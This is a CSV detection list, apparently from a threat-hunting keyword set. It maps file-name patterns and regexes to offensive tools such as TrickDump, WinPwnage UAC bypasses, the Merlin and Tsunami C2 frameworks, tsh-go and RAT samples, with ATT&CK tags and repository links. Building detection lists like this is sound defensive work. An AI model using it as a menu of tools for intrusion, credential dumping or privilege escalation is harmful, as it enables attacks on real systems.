"*\TotalRecall.txt*",".{0,1000}\\TotalRecall\.txt.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","19409" "*\TotalRecall\*_Recall_Extraction*",".{0,1000}\\TotalRecall\\.{0,1000}_Recall_Extraction.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","19410" "*\toteslegit.ps1*",".{0,1000}\\toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","19411" "*\TrickDump.sln*",".{0,1000}\\TrickDump\.sln.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","19416" "*\TrickDump-main*",".{0,1000}\\TrickDump\-main.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - 
TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","19417" "*\tricky.lnk\*",".{0,1000}\\tricky\.lnk\\.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19418" "*\tricky.ps1*",".{0,1000}\\tricky\.ps1.{0,1000}","offensive_tool_keyword","MacroMeter","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19419" "*\tricky.vbs*",".{0,1000}\\tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19420" "*\tricky2.ps1*",".{0,1000}\\tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","19421" "*\triple_mine_zil_etc_aleph.bat*",".{0,1000}\\triple_mine_zil_etc_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","19422" "*\triple_mine_zil_ethw_aleph.bat*",".{0,1000}\\triple_mine_zil_ethw_aleph\.bat.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","19423" "*\trix-back-gen.zip*",".{0,1000}\\trix\-back\-gen\.zip.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","19424" 
"*\trojan.exe*",".{0,1000}\\trojan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19425" "*\TruffleSnout.exe*",".{0,1000}\\TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19426" "*\TruffleSnout.exe*",".{0,1000}\\TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19427" "*\trustedsec\Downloads\putty.exe*",".{0,1000}\\trustedsec\\Downloads\\putty\.exe.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","powershell content","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","19428" "*\TrustedWave_x64.exe*",".{0,1000}\\TrustedWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19429" "*\TrustExec.exe*",".{0,1000}\\TrustExec\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19430" "*\TrustExec.exe*",".{0,1000}\\TrustExec\.exe.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT 
SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19431" "*\tsh_windows_amd64.exe*",".{0,1000}\\tsh_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19432" "*\tshd.go*",".{0,1000}\\tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19433" "*\tshd_windows.go*",".{0,1000}\\tshd_windows\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19434" "*\tshd_windows_amd64.exe*",".{0,1000}\\tshd_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19435" "*\tStifle.exe*",".{0,1000}\\tStifle\.exe.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for 
Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","#content","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","19436" "*\tstool.py*",".{0,1000}\\tstool\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19437" "*\tsunami.py*",".{0,1000}\\tsunami\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19439" "*\tsunami_warning.py*",".{0,1000}\\tsunami_warning\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19440" 
"*\TsunamiServer\agent\*",".{0,1000}\\TsunamiServer\\agent\\.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19441" "*\TsunamiWave_x64.exe*",".{0,1000}\\TsunamiWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19442" "*\tun2socks.*",".{0,1000}\\tun2socks\..{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","19443" "*\tun2socks-main*",".{0,1000}\\tun2socks\-main.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","19444" "*\tun2socks-windows*",".{0,1000}\\tun2socks\-windows.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","19445" "*\Tunnel Rat Control.exe*",".{0,1000}\\Tunnel\sRat\sControl\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - 
T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19446" "*\tunnel-socks5.py*",".{0,1000}\\tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","19449" "*\TunnelVision-main*",".{0,1000}\\TunnelVision\-main.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","19450" "*\TunnelVisionVM.ova*",".{0,1000}\\TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","19451" "*\turbo-intruder-all.jar*",".{0,1000}\\turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","19454" "*\uac.py*",".{0,1000}\\uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a 
nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19463" "*\uac_bypass.py*",".{0,1000}\\uac_bypass\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","19464" "*\uac_bypass.vbs*",".{0,1000}\\uac_bypass\.vbs.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","19465" "*\uac_cmstp.py*",".{0,1000}\\uac_cmstp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19466" "*\uac_compmgmtlauncher.py*",".{0,1000}\\uac_compmgmtlauncher\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19467" "*\uac_computerdefaults.py*",".{0,1000}\\uac_computerdefaults\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19468" "*\uac_dll_cliconfg.py*",".{0,1000}\\uac_dll_cliconfg\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19469" "*\uac_dll_mcx2prov.py*",".{0,1000}\\uac_dll_mcx2prov\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19470" "*\uac_dll_migwiz.py*",".{0,1000}\\uac_dll_migwiz\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19471" "*\uac_dll_sysprep.py*",".{0,1000}\\uac_dll_sysprep\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19472" "*\uac_dotnet.py*",".{0,1000}\\uac_dotnet\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19473" "*\uac_eventviewer.py*",".{0,1000}\\uac_eventviewer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19474" "*\uac_fodhelper.py*",".{0,1000}\\uac_fodhelper\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19475" 
"*\uac_mockdir.py*",".{0,1000}\\uac_mockdir\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19476" "*\uac_perfmon.py*",".{0,1000}\\uac_perfmon\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19477" "*\uac_runas.py*",".{0,1000}\\uac_runas\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19478" "*\uac_sdclt.py*",".{0,1000}\\uac_sdclt\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19479" "*\uac_sdcltcontrol.py*",".{0,1000}\\uac_sdcltcontrol\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - 
T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19480" "*\uac_sdcltisolatedcommand.py*",".{0,1000}\\uac_sdcltisolatedcommand\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19481" "*\uac_silentcleanup.py*",".{0,1000}\\uac_silentcleanup\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19482" "*\uac_slui.py*",".{0,1000}\\uac_slui\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19483" "*\uac_token_manipulation.py*",".{0,1000}\\uac_token_manipulation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19484" "*\uac_wsreset.py*",".{0,1000}\\uac_wsreset\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19485" "*\UACBypass.dll*",".{0,1000}\\UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19486" "*\UAC-Bypass.ps1*",".{0,1000}\\UAC\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense 